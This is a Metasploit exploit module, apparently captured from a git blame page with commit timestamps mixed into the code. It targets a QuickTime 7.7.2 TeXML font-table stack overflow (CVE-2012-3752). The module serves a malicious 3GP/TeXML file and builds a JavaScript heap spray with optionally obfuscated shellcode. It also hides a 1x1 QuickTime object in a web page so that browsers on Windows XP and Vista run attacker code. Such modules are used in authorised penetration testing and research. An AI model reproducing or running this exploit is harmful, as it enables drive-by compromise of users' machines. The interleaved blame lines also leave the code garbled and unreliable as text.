2012-11-22 19:56:12 +01:00
|
|
|
##
|
2017-07-24 06:26:21 -07:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-15 13:50:46 -05:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2012-11-22 19:56:12 +01:00
|
|
|
##
|
|
|
|
|
|
2016-03-08 14:02:44 +01:00
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
2013-08-30 16:28:54 -05:00
|
|
|
Rank = NormalRanking
|
|
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
|
|
|
|
|
2013-11-12 12:37:29 -06:00
|
|
|
#include Msf::Exploit::Remote::BrowserAutopwn
|
|
|
|
|
#autopwn_info({
|
2014-05-28 14:35:22 -05:00
|
|
|
# :os_name => OperatingSystems::Match::WINDOWS,
|
2013-11-12 12:37:29 -06:00
|
|
|
# :javascript => true,
|
|
|
|
|
# :rank => NormalRanking
|
|
|
|
|
#})
|
2013-08-30 16:28:54 -05:00
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
|
super(update_info(info,
|
|
|
|
|
'Name' => 'Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow',
|
|
|
|
|
'Description' => %q{
|
|
|
|
|
This module exploits a vulnerability found in Apple QuickTime. When handling
|
|
|
|
|
a TeXML file, it is possible to trigger a stack-based buffer overflow, and then
|
|
|
|
|
gain arbitrary code execution under the context of the user. This is due to the
|
|
|
|
|
QuickTime3GPP.gtx component not handling certain Style subfields properly, as the
|
|
|
|
|
font-table field, which is used to trigger the overflow in this module. Because of
|
|
|
|
|
QuickTime restrictions when handling font-table fields, only 0x31-0x39 bytes can be
|
|
|
|
|
used to overflow, so at the moment DEP/ASLR bypass hasn't been provided. The module
|
|
|
|
|
has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).
|
|
|
|
|
},
|
|
|
|
|
'Author' =>
|
|
|
|
|
[
|
|
|
|
|
'Arezou Hosseinzad-Amirkhizi', # Vulnerability Discovery
|
|
|
|
|
'juan vazquez' # Metasploit Module
|
|
|
|
|
],
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'References' =>
|
|
|
|
|
[
|
2016-07-15 12:00:31 -05:00
|
|
|
[ 'OSVDB', '87087' ],
|
2013-08-30 16:28:54 -05:00
|
|
|
[ 'CVE', '2012-3752' ],
|
|
|
|
|
[ 'BID', '56557' ],
|
|
|
|
|
[ 'URL', 'http://support.apple.com/kb/HT5581' ]
|
|
|
|
|
],
|
|
|
|
|
'DefaultOptions' =>
|
|
|
|
|
{
|
|
|
|
|
'EXITFUNC' => 'process',
|
2017-02-23 17:04:36 -06:00
|
|
|
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
|
2013-08-30 16:28:54 -05:00
|
|
|
},
|
|
|
|
|
'Payload' =>
|
|
|
|
|
{
|
|
|
|
|
'Space' => 1000,
|
|
|
|
|
},
|
|
|
|
|
'Platform' => 'win',
|
|
|
|
|
|
|
|
|
|
'Targets' =>
|
|
|
|
|
[
|
|
|
|
|
# Tested with QuickTime 7.7.2
|
|
|
|
|
[ 'Automatic', {} ],
|
|
|
|
|
[ 'IE 6 on Windows XP SP3', {} ],
|
|
|
|
|
[ 'Firefox 3.5 on Windows XP SP3', {} ],
|
|
|
|
|
[ 'Firefox 3.5.1 on Windows XP SP3', {} ]
|
|
|
|
|
],
|
|
|
|
|
'Privileged' => false,
|
|
|
|
|
'DisclosureDate' => 'Nov 07 2012',
|
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
|
[
|
|
|
|
|
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
|
2017-05-03 15:42:21 -05:00
|
|
|
])
|
2013-08-30 16:28:54 -05:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def get_target(agent)
|
|
|
|
|
#If the user is already specified by the user, we'll just use that
|
|
|
|
|
return target if target.name != 'Automatic'
|
|
|
|
|
|
|
|
|
|
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
|
|
|
|
|
|
|
|
|
|
browser_name = ""
|
|
|
|
|
if agent =~ /MSIE/
|
|
|
|
|
browser_version = agent.scan(/MSIE (\d)/).flatten[0] || ''
|
|
|
|
|
browser_name = "IE #{browser_version}"
|
|
|
|
|
elsif agent =~ /Firefox\/3.5$/
|
|
|
|
|
browser_name = "Firefox 3.5 "
|
|
|
|
|
elsif agent =~ /Firefox\/3.5.1$/
|
|
|
|
|
browser_name = "Firefox 3.5.1"
|
|
|
|
|
elsif agent =~ /Opera\/9/
|
|
|
|
|
browser_name = "Opera"
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
case nt
|
|
|
|
|
when '5.1'
|
|
|
|
|
os_name = 'Windows XP SP3'
|
|
|
|
|
when '6.0'
|
|
|
|
|
os_name = 'Windows Vista'
|
|
|
|
|
when '6.1'
|
|
|
|
|
os_name = 'Windows 7'
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
targets.each do |t|
|
|
|
|
|
if (!browser_name.empty? and t.name.include?(browser_name)) and (!nt.empty? and t.name.include?(os_name))
|
|
|
|
|
print_status("Target selected as: #{t.name}")
|
|
|
|
|
return t
|
|
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
return nil
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def on_request_uri(client, request)
|
|
|
|
|
|
|
|
|
|
return if ((p = regenerate_payload(client)) == nil)
|
|
|
|
|
|
|
|
|
|
agent = request.headers['User-Agent']
|
|
|
|
|
my_target = get_target(agent)
|
|
|
|
|
# Avoid the attack if no suitable target found
|
|
|
|
|
if my_target.nil?
|
|
|
|
|
print_error("Browser not supported, sending 404: #{agent}")
|
|
|
|
|
send_not_found(cli)
|
|
|
|
|
return
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
if request.uri =~ /\.3gp/
|
|
|
|
|
print_status("Sending exploit TEXML (target: #{my_target.name})")
|
|
|
|
|
|
|
|
|
|
my_payload = "1" * (1024*16)
|
|
|
|
|
|
|
|
|
|
texml = <<-eos
|
2012-11-22 19:56:12 +01:00
|
|
|
<?xml version="1.0"?>
|
|
|
|
|
<?quicktime type="application/x-quicktime-texml"?>
|
|
|
|
|
|
|
|
|
|
<text3GTrack trackWidth="176.0" trackHeight="60.0" layer="1"
|
2013-08-30 16:28:54 -05:00
|
|
|
language="eng" timeScale="600"
|
|
|
|
|
transform="matrix(1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 1, 0, 1.0)">
|
|
|
|
|
<sample duration="2400" keyframe="true">
|
|
|
|
|
|
|
|
|
|
<description format="tx3g" displayFlags="ScrollIn"
|
|
|
|
|
horizontalJustification="Left"
|
|
|
|
|
verticalJustification="Top"
|
|
|
|
|
backgroundColor="0%, 0%, 0%, 100%">
|
|
|
|
|
|
|
|
|
|
<defaultTextBox x="0" y="0" width="176" height="60"/>
|
|
|
|
|
<fontTable>
|
|
|
|
|
<font id="1" name="Times"/>
|
|
|
|
|
</fontTable>
|
|
|
|
|
|
|
|
|
|
<sharedStyles>
|
|
|
|
|
<style id="1">
|
|
|
|
|
{font-table: #{my_payload}}
|
|
|
|
|
{font-style:normal}
|
|
|
|
|
{font-weight: normal}
|
|
|
|
|
{font-size: 10}
|
|
|
|
|
{line-height: 100%}
|
|
|
|
|
{text-align: right}
|
|
|
|
|
{text-decoration: underline}
|
|
|
|
|
{color: 100%, 100%, 100%, 100%}
|
|
|
|
|
{backgroundcolor: 100%, 100%, 100%, 100%}
|
|
|
|
|
</style>
|
|
|
|
|
</sharedStyles>
|
|
|
|
|
</description>
|
|
|
|
|
|
|
|
|
|
<sampleData scrollDelay="200"
|
|
|
|
|
highlightColor="25%, 45%, 65%, 100%"
|
|
|
|
|
targetEncoding="utf8">
|
|
|
|
|
|
|
|
|
|
<textBox x="10" y="10" width="156" height="40"/>
|
|
|
|
|
<text styleID="1">What you need... Metasploit!</text>
|
|
|
|
|
<highlight startMarker="1" endMarker="2"/>
|
|
|
|
|
<blink startMarker="3" endMarker="4"/>
|
|
|
|
|
</sampleData>
|
|
|
|
|
</sample>
|
2012-11-22 19:56:12 +01:00
|
|
|
</text3GTrack>
|
2013-08-30 16:28:54 -05:00
|
|
|
eos
|
2012-11-22 19:56:12 +01:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
send_response(client, texml, { 'Content-Type' => "application/x-quicktime-texml" })
|
2012-11-22 19:56:12 +01:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
else
|
|
|
|
|
print_status("Sending initial HTML")
|
2012-11-22 19:56:12 +01:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
url = ((datastore['SSL']) ? "https://" : "http://")
|
|
|
|
|
url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
|
|
|
|
|
url << ":" + datastore['SRVPORT'].to_s
|
|
|
|
|
url << get_resource
|
2012-11-22 19:56:12 +01:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
fname = rand_text_alphanumeric(4)
|
2012-11-22 19:56:12 +01:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
#ARCH used by the victim machine
|
|
|
|
|
arch = Rex::Arch.endian(my_target.arch)
|
|
|
|
|
nops = Rex::Text.to_unescape("\x0c\x0c\x0c\x0c", arch)
|
|
|
|
|
code = Rex::Text.to_unescape(payload.encoded, arch)
|
2017-02-22 14:14:58 -05:00
|
|
|
randnop = rand_text_alpha(rand(100) + 1)
|
2012-11-22 19:56:12 +01:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
# Spray puts payload on 0x31313131
|
|
|
|
|
if my_target.name =~ /IE/
|
|
|
|
|
spray = <<-JS
|
2012-11-22 19:56:12 +01:00
|
|
|
var heap_obj = new heapLib.ie(0x20000);
|
|
|
|
|
var code = unescape("#{code}");
|
2017-02-22 14:14:58 -05:00
|
|
|
var #{randnop} = "#{nops}";
|
|
|
|
|
var nops = unescape(#{randnop});
|
2012-11-22 19:56:12 +01:00
|
|
|
|
|
|
|
|
while (nops.length < 0x80000) nops += nops;
|
|
|
|
|
var offset = nops.substring(0, 0x800 - code.length);
|
|
|
|
|
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
|
|
|
|
|
|
|
|
|
|
while (shellcode.length < 0x40000) shellcode += shellcode;
|
|
|
|
|
var block = shellcode.substring(0, (0x80000-6)/2);
|
|
|
|
|
|
|
|
|
|
heap_obj.gc();
|
|
|
|
|
for (var i=0; i < 1600; i++) {
|
2013-08-30 16:28:54 -05:00
|
|
|
heap_obj.alloc(block);
|
2012-11-22 19:56:12 +01:00
|
|
|
}
|
2013-08-30 16:28:54 -05:00
|
|
|
JS
|
|
|
|
|
|
|
|
|
|
#Use heaplib
|
|
|
|
|
js_spray = heaplib(spray)
|
|
|
|
|
|
|
|
|
|
#obfuscate on demand
|
|
|
|
|
if datastore['OBFUSCATE']
|
|
|
|
|
js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
|
2017-02-22 14:13:18 -05:00
|
|
|
js_spray.obfuscate(memory_sensitive: true)
|
2013-08-30 16:28:54 -05:00
|
|
|
end
|
|
|
|
|
else
|
|
|
|
|
js_spray = <<-JS
|
2012-11-23 18:48:59 +01:00
|
|
|
var shellcode = unescape("#{code}");
|
2017-02-22 14:14:58 -05:00
|
|
|
var #{randnop} = "#{nops}";
|
|
|
|
|
var bigblock = unescape(#{randnop});
|
2012-11-23 18:48:59 +01:00
|
|
|
var headersize = 20;
|
|
|
|
|
var slackspace = headersize + shellcode.length;
|
|
|
|
|
while (bigblock.length < slackspace) bigblock += bigblock;
|
|
|
|
|
var fillblock = bigblock.substring(0,slackspace);
|
|
|
|
|
var block = bigblock.substring(0,bigblock.length - slackspace);
|
|
|
|
|
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
|
|
|
|
|
var memory = new Array();
|
|
|
|
|
for (i = 0; i < 750; i++){ memory[i] = block + shellcode }
|
2013-08-30 16:28:54 -05:00
|
|
|
JS
|
|
|
|
|
end
|
2012-11-22 19:56:12 +01:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
content = "<html>"
|
|
|
|
|
content << <<-JSPRAY
|
2012-11-22 19:56:12 +01:00
|
|
|
<head>
|
|
|
|
|
<script>
|
|
|
|
|
#{js_spray}
|
|
|
|
|
</script>
|
|
|
|
|
</head>
|
2013-08-30 16:28:54 -05:00
|
|
|
JSPRAY
|
|
|
|
|
content << "<body>"
|
2012-11-23 18:48:59 +01:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
content << <<-ENDEMBED
|
2012-11-22 19:56:12 +01:00
|
|
|
<OBJECT
|
|
|
|
|
CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
|
|
|
|
|
WIDTH="1"
|
|
|
|
|
HEIGHT="1"
|
|
|
|
|
CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab">
|
|
|
|
|
<PARAM name="SRC" VALUE = "#{url}/#{fname}.3gp">
|
|
|
|
|
<PARAM name="QTSRC" VALUE = "#{url}/#{fname}.3gp">
|
|
|
|
|
<PARAM name="AUTOPLAY" VALUE = "true" >
|
|
|
|
|
<PARAM name="TYPE" VALUE = "video/quicktime" >
|
|
|
|
|
<PARAM name="TARGET" VALUE = "myself" >
|
|
|
|
|
<EMBED
|
2013-08-30 16:28:54 -05:00
|
|
|
SRC = "#{url}/#{fname}.3gp"
|
|
|
|
|
QTSRC = "#{url}/#{fname}.3gp"
|
|
|
|
|
TARGET = "myself"
|
|
|
|
|
WIDTH = "1"
|
|
|
|
|
HEIGHT = "1"
|
|
|
|
|
AUTOPLAY = "true"
|
|
|
|
|
PLUGIN = "quicktimeplugin"
|
|
|
|
|
TYPE = "video/quicktime"
|
|
|
|
|
CACHE = "false"
|
|
|
|
|
PLUGINSPAGE= "http://www.apple.com/quicktime/download/" >
|
2012-11-22 19:56:12 +01:00
|
|
|
</EMBED>
|
|
|
|
|
</OBJECT>
|
2013-08-30 16:28:54 -05:00
|
|
|
ENDEMBED
|
2012-11-23 18:48:59 +01:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
content << "</body></html>"
|
2012-11-22 19:56:12 +01:00
|
|
|
|
2013-08-30 16:28:54 -05:00
|
|
|
send_response(client, content, { 'Content-Type' => "text/html" })
|
|
|
|
|
end
|
|
|
|
|
end
|
2012-11-22 19:56:12 +01:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
=begin
|
|
|
|
|
* Routine checking only for '1'-'9' chars for the vaules on the vulnerable style fields (font-table, font-size and line-height)
|
|
|
|
|
|
|
|
|
|
int __fastcall sub_67EED2B0(int a1, int a2)
|
|
|
|
|
{
|
|
|
|
|
int result; // eax@1
|
|
|
|
|
unsigned __int8 v3; // cl@2
|
|
|
|
|
|
|
|
|
|
for ( result = 0; ; ++result )
|
|
|
|
|
{
|
|
|
|
|
v3 = *(_BYTE *)a2++ - 0x30;
|
|
|
|
|
if ( v3 > 9u )
|
|
|
|
|
break;
|
|
|
|
|
}
|
|
|
|
|
return result;
|
|
|
|
|
}
|
2014-06-17 21:03:18 +02:00
|
|
|
=end
|
